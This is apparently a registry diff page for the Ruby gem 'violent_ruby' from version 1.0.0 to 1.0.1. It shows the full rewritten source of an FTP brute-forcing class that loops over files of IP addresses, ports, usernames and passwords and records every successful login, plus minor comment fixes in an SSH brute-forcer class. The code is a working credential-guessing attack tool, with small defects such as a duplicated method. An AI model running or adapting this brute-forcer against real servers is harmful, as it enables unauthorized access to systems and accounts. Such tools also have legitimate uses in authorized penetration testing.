violent_ruby 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA1:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: cda346e57dd13576d7868364849f39b07f1d3358
|
|
4
|
+
data.tar.gz: b2bab88d80cfcdcf1905d37e5133290ff2ffacee
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 24d0dd09c999a3e0115b2c845257e01c24d4c4aa662e2c587cf103b0e3811be120c85d3da92af7efbc2ec32708e4effb333155c4d9a406575f0c31b61ee8658e
|
|
7
|
+
data.tar.gz: d04fa5bd6b888b5210a2332ca099046566296f22977a996b484f82a11c381305269199b40009813f143fee9ab87dde8b6d3298ace24ebc62d413eec287686ad4
|
|
@@ -1,143 +1,208 @@
|
|
|
1
1
|
require 'net/ftp'
|
|
2
2
|
|
|
3
3
|
module ViolentRuby
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
4
|
+
# The Ftp Brute Forcer class provides a simply way to
|
|
5
|
+
# brute-force an FTP server's credentials.
|
|
6
|
+
# @author Kent 'picat' Gruber
|
|
7
|
+
#
|
|
8
|
+
# @example Basic Usage
|
|
9
|
+
# ftp = FtpBruteForcer.new
|
|
10
|
+
# ftp.users = "resources/ftp_users.txt"
|
|
11
|
+
# ftp.passwords = "resources/ftp_passwords.txt"
|
|
12
|
+
# ftp.ips = "resources/ftp_ips.txt"
|
|
13
|
+
# ftp.ports = "resources/ftp_ports.txt"
|
|
14
|
+
# # brue'm!
|
|
15
|
+
# ftp.brute_force!
|
|
16
|
+
# # => results
|
|
17
|
+
#
|
|
18
|
+
class FtpBruteForcer
|
|
19
|
+
# @attr [String] users Path to file containing users.
|
|
19
20
|
attr_accessor :users
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
#
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
|
|
55
|
-
|
|
56
|
-
|
|
57
|
-
|
|
58
|
-
|
|
59
|
-
|
|
60
|
-
|
|
61
|
-
|
|
62
|
-
|
|
63
|
-
|
|
64
|
-
|
|
65
|
-
|
|
66
|
-
|
|
67
|
-
|
|
68
|
-
|
|
69
|
-
|
|
70
|
-
|
|
71
|
-
|
|
72
|
-
|
|
73
|
-
|
|
74
|
-
|
|
75
|
-
|
|
76
|
-
|
|
77
|
-
|
|
78
|
-
|
|
79
|
-
|
|
80
|
-
|
|
81
|
-
|
|
82
|
-
|
|
83
|
-
|
|
84
|
-
|
|
85
|
-
|
|
86
|
-
|
|
87
|
-
|
|
88
|
-
|
|
89
|
-
|
|
90
|
-
|
|
91
|
-
|
|
92
|
-
|
|
93
|
-
|
|
94
|
-
|
|
95
|
-
|
|
96
|
-
|
|
97
|
-
|
|
98
|
-
|
|
99
|
-
|
|
100
|
-
|
|
101
|
-
|
|
102
|
-
|
|
103
|
-
|
|
104
|
-
|
|
105
|
-
|
|
106
|
-
|
|
107
|
-
|
|
108
|
-
|
|
109
|
-
|
|
110
|
-
|
|
111
|
-
|
|
112
|
-
|
|
113
|
-
|
|
114
|
-
|
|
115
|
-
|
|
116
|
-
|
|
117
|
-
|
|
118
|
-
|
|
119
|
-
|
|
120
|
-
|
|
121
|
-
|
|
122
|
-
|
|
123
|
-
|
|
124
|
-
|
|
125
|
-
|
|
126
|
-
|
|
127
|
-
|
|
128
|
-
|
|
129
|
-
|
|
130
|
-
|
|
131
|
-
|
|
132
|
-
|
|
133
|
-
|
|
134
|
-
|
|
135
|
-
|
|
136
|
-
|
|
137
|
-
|
|
138
|
-
|
|
139
|
-
|
|
140
|
-
|
|
141
|
-
|
|
142
|
-
|
|
21
|
+
# @attr [String] passwords Path to file containing passwords.
|
|
22
|
+
attr_accessor :passwords
|
|
23
|
+
# @attr [String] ips Path to file containing ip addresses.
|
|
24
|
+
attr_accessor :ips
|
|
25
|
+
# @attr [String] ports Path to file containing ports.
|
|
26
|
+
attr_accessor :ports
|
|
27
|
+
|
|
28
|
+
# Create a new Ftp Brute Forcer.
|
|
29
|
+
#
|
|
30
|
+
# @param [Hash] args The options to create a new Ftp Brute Forcer.
|
|
31
|
+
# @param args [String] :users The path to a file of users to attempt.
|
|
32
|
+
# @param args [String] :passwords The path to a file of passwords to attempt.
|
|
33
|
+
# @param args [String] :ips The path to a file of server ips to attempt to connect to.
|
|
34
|
+
# @param args [String] :ports The path to a file of service ports to attempt to connect to.
|
|
35
|
+
def initialize(args = {})
|
|
36
|
+
@users = args[:users] if args[:users] && File.readable?(args[:users])
|
|
37
|
+
@passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
|
|
38
|
+
@ips = args[:ips] if args[:ips] && File.readable?(args[:ips])
|
|
39
|
+
@ports = args[:ports] if args[:ports] && File.readable?(args[:ports])
|
|
40
|
+
@ftp = Net::FTP.new
|
|
41
|
+
end
|
|
42
|
+
|
|
43
|
+
# Brute force some'a dem FTP login credz.
|
|
44
|
+
#
|
|
45
|
+
# @param [Hash] args The options to brute force.
|
|
46
|
+
# @param args [String] :users The path to a file of users to attempt.
|
|
47
|
+
# @param args [String] :passwords The path to a file of passwords to attempt.
|
|
48
|
+
# @param args [String] :ips The path to a file of server ips to attempt to connect to.
|
|
49
|
+
# @param args [String] :ports The path to a file of service ports to attempt to connect to.
|
|
50
|
+
def brute_force(args = {})
|
|
51
|
+
meets_our_requirements?(args)
|
|
52
|
+
results = []
|
|
53
|
+
ips = args[:ips] || @ips
|
|
54
|
+
ports = args[:ports] || @ports
|
|
55
|
+
users = args[:users] || @users
|
|
56
|
+
passwords = args[:passwords] || @passwords
|
|
57
|
+
iterate_over(ips).each do |ip|
|
|
58
|
+
iterate_over(ports).each do |port|
|
|
59
|
+
next unless connectable?(ip: ip, port: port)
|
|
60
|
+
iterate_over(users).each do |user|
|
|
61
|
+
iterate_over(passwords).each do |password|
|
|
62
|
+
if able_to_login?(ip: ip, port: port, username: user, password: password)
|
|
63
|
+
result = format_result("SUCCESS", ip, port, user, password)
|
|
64
|
+
else
|
|
65
|
+
result = format_result("FAILURE", ip, port, user, password)
|
|
66
|
+
end
|
|
67
|
+
results << result
|
|
68
|
+
yield result if block_given?
|
|
69
|
+
end
|
|
70
|
+
end
|
|
71
|
+
end
|
|
72
|
+
end
|
|
73
|
+
results
|
|
74
|
+
end
|
|
75
|
+
|
|
76
|
+
# brute_force! is the same as brute_force
|
|
77
|
+
alias brute_force! brute_force
|
|
78
|
+
|
|
79
|
+
# Check if a given IP address and port can connceted to.
|
|
80
|
+
# @see #brute_force
|
|
81
|
+
# @param [Hash] args the options to brute force.
|
|
82
|
+
# @param args [String] :ip The ip address to attempt to connect to.
|
|
83
|
+
# @param args [String] :port The port to attempt to connect to.
|
|
84
|
+
# @return [Boolean]
|
|
85
|
+
def connectable?(args = {})
|
|
86
|
+
@ftp.connect(args[:ip], args[:port])
|
|
87
|
+
return true if @ftp.last_response_code == "220"
|
|
88
|
+
false
|
|
89
|
+
rescue
|
|
90
|
+
false
|
|
91
|
+
end
|
|
92
|
+
|
|
93
|
+
# Check if a given IP address, port, username and passwords
|
|
94
|
+
# are correct to login.
|
|
95
|
+
# @see #brute_force
|
|
96
|
+
# @param [Hash] args
|
|
97
|
+
# @param args [String] :ip
|
|
98
|
+
# @param args [String] :port
|
|
99
|
+
# @param args [String] :username
|
|
100
|
+
# @param args [String] :password
|
|
101
|
+
# @return [Boolean]
|
|
102
|
+
def able_to_login?(args = {})
|
|
103
|
+
@ftp.connect(args[:ip], args[:port])
|
|
104
|
+
@ftp.login(args[:username], args[:password])
|
|
105
|
+
if @ftp.welcome == "230 Login successful.\n"
|
|
106
|
+
@ftp.close
|
|
107
|
+
return true
|
|
108
|
+
end
|
|
109
|
+
ftp_login.quit
|
|
110
|
+
false
|
|
111
|
+
rescue
|
|
112
|
+
false
|
|
113
|
+
end
|
|
114
|
+
|
|
115
|
+
|
|
116
|
+
private
|
|
117
|
+
|
|
118
|
+
# @api private
|
|
119
|
+
# Format the results from brute force attempts.
|
|
120
|
+
# @see #brute_force
|
|
121
|
+
# @param [String] type
|
|
122
|
+
# @param [String] ip
|
|
123
|
+
# @param [Integer] port
|
|
124
|
+
# @param [String] user
|
|
125
|
+
# @param [String] password
|
|
126
|
+
# @return [Hash]
|
|
127
|
+
def format_result(type, ip, port, user, password)
|
|
128
|
+
{ time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
|
|
129
|
+
end
|
|
130
|
+
|
|
131
|
+
# @api private
|
|
132
|
+
# Iterate over each line in a file, stripping each line as it goes.
|
|
133
|
+
# @see File
|
|
134
|
+
# @param [String] file
|
|
135
|
+
# @return [Enumerator]
|
|
136
|
+
def iterate_over(file)
|
|
137
|
+
File.foreach(file).map(&:strip)
|
|
138
|
+
end
|
|
139
|
+
|
|
140
|
+
# @api private
|
|
141
|
+
# Check if the given arguments contain an ip, port, password and user files.
|
|
142
|
+
# @see #brute_force
|
|
143
|
+
# @param [Hash] args the options to brute force.
|
|
144
|
+
# @param args [String] :ips
|
|
145
|
+
# @param args [String] :ports
|
|
146
|
+
# @param args [String] :passwords
|
|
147
|
+
# @param args [String] :users
|
|
148
|
+
# @return [Boolean]
|
|
149
|
+
def meets_our_requirements?(args = {})
|
|
150
|
+
raise "No ip addresses to connect to." unless ips?(args)
|
|
151
|
+
raise "No ports to connect to." unless ports?(args)
|
|
152
|
+
raise "No passwords to try." unless passwords?(args)
|
|
153
|
+
raise "No users to try." unless users?(args)
|
|
154
|
+
true
|
|
155
|
+
end
|
|
156
|
+
|
|
157
|
+
# @api private
|
|
158
|
+
# Check if the given arguments contains ips, or has been set.
|
|
159
|
+
# @see #meets_our_requirements?
|
|
160
|
+
# @param [Hash] args the options to brute force.
|
|
161
|
+
# @param args [String] :ips
|
|
162
|
+
# @return [Boolean]
|
|
163
|
+
def ips?(args = {})
|
|
164
|
+
return true if args[:ips] || @ips
|
|
165
|
+
false
|
|
166
|
+
end
|
|
167
|
+
|
|
168
|
+
# @api private
|
|
169
|
+
# Check if the given arguments contains passwords, or has been set.
|
|
170
|
+
# @see #meets_our_requirements?
|
|
171
|
+
# @param [Hash] args
|
|
172
|
+
# @param args [String] :passwords
|
|
173
|
+
# @return [Boolean]
|
|
174
|
+
def passwords?(args = {})
|
|
175
|
+
return true if args[:passwords] || @passwords
|
|
176
|
+
false
|
|
177
|
+
end
|
|
178
|
+
def passwords?(args = {})
|
|
179
|
+
return true if args[:passwords] || @passwords
|
|
180
|
+
false
|
|
181
|
+
end
|
|
182
|
+
|
|
183
|
+
# @api private
|
|
184
|
+
# Check if the given arguments contains ports, or has been set.
|
|
185
|
+
# @see #meets_our_requirements?
|
|
186
|
+
# @param [Hash] args
|
|
187
|
+
# @param args [String] :ports
|
|
188
|
+
# @return [Boolean]
|
|
189
|
+
def ports?(args = {})
|
|
190
|
+
return true if args[:ports] || @ports
|
|
191
|
+
false
|
|
192
|
+
end
|
|
193
|
+
|
|
194
|
+
# @api private
|
|
195
|
+
# Check if the given arguments contains users, or has been set.
|
|
196
|
+
# @see #meets_our_requirements?
|
|
197
|
+
# @param [Hash] args
|
|
198
|
+
# @param args [String] :users
|
|
199
|
+
# @return [Boolean]
|
|
200
|
+
def users?(args = {})
|
|
201
|
+
return true if args[:users] || @users
|
|
202
|
+
false
|
|
203
|
+
end
|
|
204
|
+
|
|
205
|
+
|
|
206
|
+
|
|
207
|
+
end
|
|
143
208
|
end
|
|
@@ -14,7 +14,7 @@ module ViolentRuby
|
|
|
14
14
|
# ssh.ips = "resources/ssh_ips.txt"
|
|
15
15
|
# ssh.ports = "resources/ssh_ports.txt"
|
|
16
16
|
# # brue'm!
|
|
17
|
-
#
|
|
17
|
+
# ssh.brute_force!
|
|
18
18
|
# # => results
|
|
19
19
|
#
|
|
20
20
|
class SSHBruteForcer
|
|
@@ -24,7 +24,7 @@ module ViolentRuby
|
|
|
24
24
|
attr_accessor :passwords
|
|
25
25
|
# @attr [String] ips Path to file containing ip addresses.
|
|
26
26
|
attr_accessor :ips
|
|
27
|
-
# @attr [String]
|
|
27
|
+
# @attr [String] ports Path to file containing ports.
|
|
28
28
|
attr_accessor :ports
|
|
29
29
|
|
|
30
30
|
# Create a new SSH Brute Forcer.
|
data/lib/violent_ruby/version.rb
CHANGED